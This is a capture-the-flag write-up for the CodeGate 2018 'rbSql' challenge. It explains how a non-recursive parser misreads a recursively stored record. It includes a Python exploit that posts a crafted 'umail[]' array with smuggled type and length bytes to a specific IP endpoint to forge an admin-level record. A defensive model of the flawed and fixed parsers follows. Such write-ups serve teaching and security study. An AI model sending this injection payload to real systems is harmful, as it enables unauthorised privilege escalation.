This challenge is open source; the main files are [index.php](https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/index.php) and [dbconn.php](https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/dbconn.php).

On this site, we can join, log in, and view our info. It stores data in a specially constructed file. The first byte of the file is ``\x01`` or ``\x02``, which indicates whether a string or an array is stored. The second byte stores the length of the string or array.

When we log in as admin, we can get the flag, but it seems we can only join as guest. After a source code audit, I noticed that this site stores data recursively but does not parse it recursively. So if we construct a complicated array, the parser will misparse it, and then we can generate any value we want. The final exploit is:

```python
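import requests

# The "umail[]" key makes PHP receive umail as an array instead of a string.
# The value embeds the format's own type and length bytes
# (\x20 = 32, \x01\x0d = string of length 13, \x01\x01 = string of length 1).
data = {
    "uid": "lyle",
    "umail[]": "\x20a87ff679a2f3e71d9181a67b7542122c\x01\x0d192.168.186.1\x01\x012",
    "upw": "1",
}
requests.post("http://52.78.188.150/rbsql_4f6b17dc3d565ce63ef3c4ff9eef93ad/?page=join_chk", data)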
```
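
A small model of the storage format and the store/parse mismatch described above, next to a parser that descends recursively and checks type bytes and bounds. This is an added example, not the challenge's dbconn.php: `pack`, `parse_flat`, `parse`, the five-field record layout and every sample value are assumptions constructed for illustration.

```python
# Model only: names and record layout are assumptions, not the challenge's code.
STR, ARR = 0x01, 0x02  # type bytes as described on this page

def pack(value):
    """Recursive serializer: type byte, one length/count byte, then the payload."""
    if isinstance(value, list):
        kind, n, body = ARR, len(value), b"".join(pack(v) for v in value)
    else:
        body = value.encode("latin-1")
        kind, n = STR, len(body)
    if n > 255:
        raise ValueError("length does not fit in one byte")
    return bytes([kind, n]) + body

def parse_flat(blob):
    """Assumed non-recursive parser: treats every top-level element as a string."""
    count, pos, out = blob[1], 2, []
    for _ in range(count):
        length = blob[pos + 1]  # the type byte at blob[pos] is never checked
        out.append(blob[pos + 2:pos + 2 + length].decode("latin-1"))
        pos += 2 + length
    return out

def parse(blob, pos=0):
    """Recursive parser that checks type and bounds; returns (value, next_pos)."""
    if pos + 2 > len(blob):
        raise ValueError("truncated header")
    kind, n = blob[pos], blob[pos + 1]
    pos += 2
    if kind == STR:
        if pos + n > len(blob):
            raise ValueError("truncated string")
        return blob[pos:pos + n].decode("latin-1"), pos + n
    if kind != ARR:
        raise ValueError("unknown type byte")
    items = []
    for _ in range(n):
        item, pos = parse(blob, pos)
        items.append(item)
    return items, pos

# Constructed record (uid, mail, password hash, ip, level); mail arrives as an array.
inner = "\x03abc" + "\x01\x071.2.3.4" + "\x01\x012"
record = ["bob", [inner], "realhash", "10.0.0.5", "1"]
blob = pack(record)

if __name__ == "__main__":
    print("flat     :", parse_flat(blob))
    print("recursive:", parse(blob)[0])
```

The flat parser reads the fields from inside the mail element and never reaches the stored hash, IP and level, while the recursive parser returns the record exactly as stored. Rejecting array input where a string field is expected closes the same gap at the application layer.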

Original writeup (https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/index.md).